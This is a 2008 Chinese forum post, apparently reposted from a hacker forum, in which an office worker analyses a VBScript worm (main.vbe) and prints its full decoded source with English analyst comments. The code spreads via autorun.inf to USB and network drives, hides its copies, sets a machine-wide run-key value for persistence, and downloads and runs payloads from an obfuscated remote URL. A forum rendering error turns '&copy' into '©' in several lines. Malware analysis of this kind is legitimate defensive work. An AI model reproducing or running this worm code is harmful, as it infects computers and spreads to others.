楼主
发表于 2008-11-23 11:20
前提:
最近同个办公室的人反映自己莫名其妙地中病毒,我没放在心上,没想到自己人中了一个,所以就有了今天的这个帖子。
话说,某天晚上我们一伙人正在赶工。。。突然,某人大呼:“我的CPU占用率怎么居高不下?”抄起processxp,发现wscript.exe一直在找一个main.vbe,没事怎么会乱运行脚本呢?肯定中毒了!而且可能是传说中的办公室病毒。。。真不巧,遇到我们了。。。呵呵,开始解剖吧!对于这种脚本病毒,我们的解决方法是禁用vbscript.dll,运行“regsvr32 -u vbscript.dll”,然后CPU就安静下来了。。。那么打开我们的main.vbe吧!在C盘根目录下,首先去掉这个脚本病毒的隐藏和系统属性,然后用记事本打开看看!全是乱码!哎~又是老一套,加密给受害者看,看到头大了,自然没有消灭的想法,但是要运行的话肯定也要解密!果然,在密密麻麻的乱码后面,出现一句execute(thistext),这个thistext不就是病毒明文吗?好,那就把它写出来!把execute(thistext)换成
' Analyst dump hook: stands in for the loader's execute(thistext) so the decoded
' script body is written to c:\testfile.txt instead of being run. thistext is
' the variable the obfuscated loader builds; it is not defined in this snippet.
Dim fso, MyFile
Set fso = CreateObject("Scripting.FileSystemObject")
Set MyFile = fso.CreateTextFile("c:\testfile.txt", True)
MyFile.WriteLine(thistext)
MyFile.Close
再注册一下vbscript.dll
运行!一下子就把病毒揪出来了!
代码:
' ---- Analyst annotation: decoded body of the main.vbe dropper/worm ----
' Flow: locate itself, single-instance check, (re)build autorun.inf, optionally
' fetch an update list over HTTP, then either spread across drives (when run
' from the System folder) or install itself into the System folder and C:\.
' Host indicators visible in this script: an autorun.inf whose first line is
' "daxian"&ver, main.vbe/main.txt/main.vbs in the System folder and drive roots,
' a payload named like "7+11.exe", the HKLM ...\policies\Explorer\run\explorer
' value and HKCU ...\Explorer\Advanced\ShowSuperHidden=0.
ver="3.0"
' Marker written as line 1 of autorun.inf; readtxt(...,1)<>tile is the
' "not yet carrying this version" test used below and in ganran().
tile="daxian"&ver
about="daxianbiyele 2007.7.11"
' Update-list URL assembled from chr() codes (chr(104)&chr(116)&chr(116)&chr(112)
' spells "http"), presumably to defeat plain-text string matching; left undecoded.
fromurl=chr(104)&chr(116)&chr(116)&chr(112)&"://"&chr(104)&chr(103)&"z."&chr(100)&"in"&chr(103)&chr(104)&"ui123."&chr(99)&"n/wan."&chr(97)&"s"&chr(112)
' Every runtime error from here on is silently ignored.
on error resume next
dim wsh
dim WshShell
Set Wsh =CreateObject("WScript.Shell")
set WshShell=Wscript.CreateObject("Wscript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
' GetSpecialFolder(1) is the Windows System folder; it is the install target.
set dir = FSO.GetSpecialFolder(1)
Set dc = FSO.Drives
' Own file name and directory; sys=true means this copy already lives in System.
ouwnname=Wscript.ScriptName
mulu=left(Wscript.ScriptFullName,len(Wscript.ScriptFullName)-len(Wscript.ScriptName))
if mulu=dir&"\" then sys=true
' When launched from a drive root (i.e. via autorun.inf) open Explorer on that
' drive, presumably so the user sees the behaviour they expected from the click.
For Each d In dc
if mulu=d&"\" then opendisk=WshShell.Run("explorer "&d,3,false)
Next
' Single-instance guard for the non-System copy: count wscript.exe processes
' through WMI and exit when another one is running.
if not sys=true then
wscript.sleep 2000
set y=getobject("winmgmts:\\.\root\cimv2")
set x=y.execquery("select * from win32_process where name='wscript.exe'")
i=0
for each j in x
i=i+1
next
if i>1 then wscript.quit
end if
' Turn off "show protected operating system files" (ShowSuperHidden=0).
yincang
' Make sure the autorun.inf next to this script carries this version's marker.
If fso.FileExists(mulu&"autorun.inf") Then
if readtxt(mulu&"autorun.inf",1)<>tile then
buildinf ver,"7+11.exe",now
end If
else
buildinf ver,"7+11.exe",now
End If
' Line 7 of autorun.inf is the payload exe name (see buildinf).
' NOTE(review): "mulu©exe" here and on the lines below reads as "mulu&copyexe"
' with the "&copy" sequence rendered as © by the forum page; the original source
' presumably concatenated mulu and copyexe.
copyexe=readtxt(mulu&"autorun.inf",7)
' sjs is a random day of month 1..31; on that day the update branch runs
' instead of the payload.
randomize
sjs=int(Rnd * (31-1+1)) + 1
If fso.FileExists(mulu©exe) and Day(Date)<>sjs then
if sys=true then WshShell.run mulu©exe
Else
' Update branch: download a text list from fromurl and read it line by line:
' line 2 = update flag, 3 = exe version, 4 = exe URL, 5 = script version,
' 6 = script file name, 7 = script URL, 8 = text later stored as autorun.inf line 10.
Ldownver=readtxt(mulu&"autorun.inf",5)
downfile mulu&"temp.txt",fromurl,0
Set OpenFile = FSO.OpenTextFile(mulu&"temp.txt", 1)
nouse = OpenFile.ReadLine
downis = OpenFile.ReadLine
downver = OpenFile.ReadLine
' Payload name is derived from today's date, e.g. "7+11.exe".
downname = month(Date)&"+"&Day(Date)&".exe"
downfrom = OpenFile.ReadLine
vbsver = OpenFile.ReadLine
vbsname = OpenFile.ReadLine
vbsurl = OpenFile.ReadLine
guanggao= OpenFile.ReadLine
OpenFile.Close
FSO.DeleteFile(mulu&"temp.txt")
if downis=1 then
' Newer script version: fetch it, run it (runfile=1) and exit this copy.
If vbsver<>ver then
downfile mulu&vbsname,vbsurl,1
wscript.quit
end if
' Newer payload version: fetch it and rewrite autorun.inf with the new name.
If downver<>Ldownver then
downfile mulu&downname,downfrom,0
buildinf downver,downname,guanggao
end if
end if
End If
copyexe=readtxt(mulu&"autorun.inf",7)
if sys=true then
' System-folder copy: ganran() is an endless loop, so the run of its own file
' on the next line appears unreachable in normal operation.
ganran()
WshShell.run mulu&ouwnname
else
' Non-System copy: hide itself (2+4 = Hidden+System), drop copies as main.vbe
' and main.txt in the System folder together with autorun.inf and the payload,
' mirror that set to C:\ when not already running from there, register the
' Explorer Run policy value, and start the System-folder copy.
shuxing mulu&ouwnname,2+4
copyvbs dir&"\main.vbe"
copyvbs dir&"\main.txt"
CopyFile mulu&"autorun.inf",dir&"\autorun.inf"
CopyFile mulu©exe,dir&"\"©exe
shuxing dir&"\"©exe,2+4
if mulu<>"C:\" then
copyvbs "c:\main.vbs"
CopyFile mulu&"autorun.inf","c:\autorun.inf"
CopyFile mulu©exe,"c:\"©exe
end if
zhuce
WshShell.run dir&"\main.vbe"
end if
' Copy file over where (overwrite=True), first clearing the destination's
' attributes so a read-only/hidden target does not block the copy.
' Does nothing when the source is missing; errors are swallowed by the
' script-wide On Error Resume Next.
function copyfile(file,where)
shuxing where,0
if fso.FileExists(file) then FSO.CopyFile file,where,True
end function
' Self-replication: read this script's own source (mulu&ouwnname) and write it
' to where, then mark the copy Hidden+System (2+4). Called for main.vbe,
' main.txt and c:\main.vbs.
function copyvbs(where)
shuxing where,0
set self=fso.opentextfile(mulu&ouwnname,1)
vbscopy=self.readall
self.close
set vbs = fso.CreateTextFile(where, True)
vbs.write vbscopy
vbs.close
shuxing where,2+4
end function
' Persistence: writes the REG_SZ value "explorer"="main.vbe" under the
' machine-wide policies\Explorer\run key, the Group Policy "run these programs
' at logon" list. Requires write access to HKLM; this value is a direct
' host indicator for this family.
function zhuce()
RegPath="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\"
Type_Name="REG_SZ"
Key_Name="explorer"
Key_Data="main.vbe"
WshShell.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function
' Concealment: sets the per-user Explorer option ShowSuperHidden to 0 so files
' marked Hidden+System (the dropped copies and autorun.inf) stay invisible
' even when "show hidden files" is enabled.
function yincang()
RegPath="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"
Type_Name="REG_DWORD"
Key_Name="ShowSuperHidden"
Key_Data="00000000"
WshShell.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function
' Rewrite mulu&"autorun.inf" with a fixed 10-line layout that doubles as the
' worm's state file. Lines the script reads back via readtxt():
'   1 = tile (version marker), 5 = exever, 7 = exename, 10 = adv.
' Lines 2/4/8/9 are the real autorun directives that launch main.vbs on
' open/double-click; the label on line 6 is "Open(&O)" in Chinese.
' The file is left ReadOnly+Hidden+System (1+2+4).
function buildinf(exever,exename,adv)
shuxing mulu&"autorun.inf",0
set ini = fso.CreateTextFile(mulu&"autorun.inf", True)
ini.writeline tile
ini.writeline "[AutoRun]"
ini.writeline about
ini.writeline "open=WScript.exe .\main.vbs"
ini.writeline exever
ini.writeline "shell\open=打开(&O)"
ini.writeline exename
ini.writeline "shell\open\Command=WScript.exe .\main.vbs"
ini.writeline "shell\open\Default=1"
ini.writeline adv
ini.close
shuxing mulu&"autorun.inf",1+2+4
end function
' Return line number `line` (1-based) of text file where. Reads lines one by
' one and keeps the last; with On Error Resume Next a short file yields
' whatever RLine last held (possibly empty).
function readtxt(where,line)
Set readfile = fso.OpenTextFile(where, 1)
i=0
do while i<line
i=i+1
RLine = readfile.ReadLine
loop
readfile.Close
readtxt=RLine
end function
' Set the attribute bitmask of file (FSO constants: 1 ReadOnly, 2 Hidden,
' 4 System; 0 clears them). No-op when the file does not exist.
function shuxing(file,change)
if fso.FileExists(file) then
Set oFile = FSO.GetFile(file)
oFile.Attributes = change
Set oFile = Nothing
end if
end function
' Downloader: GET urlfile with Microsoft.XMLHTTP, write the raw response body
' to localfile through an ADODB.Stream (Mode 3 read/write, Type 1 binary,
' SaveToFile option 2 = overwrite), mark it Hidden+System and, when
' runfile=1, execute it. The repeated "'if 1=2 ..." comment lines carry no
' code; presumably padding to alter the file's byte pattern.
function downfile(localfile,urlfile,runfile)
shuxing localfile,0
iLocal = LCase(localfile):iRemote = LCase(urlfile):
'if 1=2 then Wscript.echo "Impossible!"
Set xPost = CreateObject("Microsoft.XMLHTTP")
'if 1=2 then Wscript.echo "Impossible!"
xPost.Open "get",iRemote,0
'if 1=2 then Wscript.echo "Impossible!"
xPost.Send()
'if 1=2 then Wscript.echo "Impossible!"
Set sGet = CreateObject("ADODB.Stream")
'if 1=2 then Wscript.echo "Impossible!"
sGet.Mode = 3
'if 1=2 then Wscript.echo "Impossible!"
sGet.Type = 1
'if 1=2 then Wscript.echo "Impossible!"
sGet.Open()
'if 1=2 then Wscript.echo "Impossible!"
sGet.Write(xPost.responseBody)
'if 1=2 then Wscript.echo "Impossible!"
sGet.SaveToFile iLocal,2
'if 1=2 then Wscript.echo "Impossible!"
shuxing localfile,2+4
if runfile=1 then Wsh.run iLocal
end function
' Spreader, run only by the System-folder copy. Endless loop (no Exit Do) that
' every 2 s walks all drives and, for network drives (DriveType 3) and
' removable drives other than A:/B: (DriveType 1), plants autorun.inf, the
' payload exe and main.txt renamed to main.vbs in the drive root. A root that
' already has main.vbs+autorun.inf is only overwritten when the inf's first
' line is not this version's marker. The constant polling of every mounted
' drive is what produced the sustained wscript.exe CPU load described in the post.
function ganran()
do
For Each d In dc
If d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
If fso.FileExists(d&"\main.vbs") and fso.FileExists(d&"\autorun.inf") then
if readtxt(d&"\autorun.inf",1)<>tile then
CopyFile dir&"\autorun.inf",d&"\autorun.inf"
CopyFile dir&"\"©exe,d&"\"©exe
CopyFile dir&"\main.txt",d&"\main.vbs"
end if
else
CopyFile dir&"\autorun.inf",d&"\autorun.inf"
CopyFile dir&"\"©exe,d&"\"©exe
CopyFile dir&"\main.txt",d&"\main.vbs"
end if
End If
next
wscript.sleep 2000
loop
end function
后记:
呵呵,临时解决方法在上面了,我也没时间去解读这个病毒了~~~还请高手们给出完美解决方案!继续赶工ing。。。。。。
转自红色黑客联盟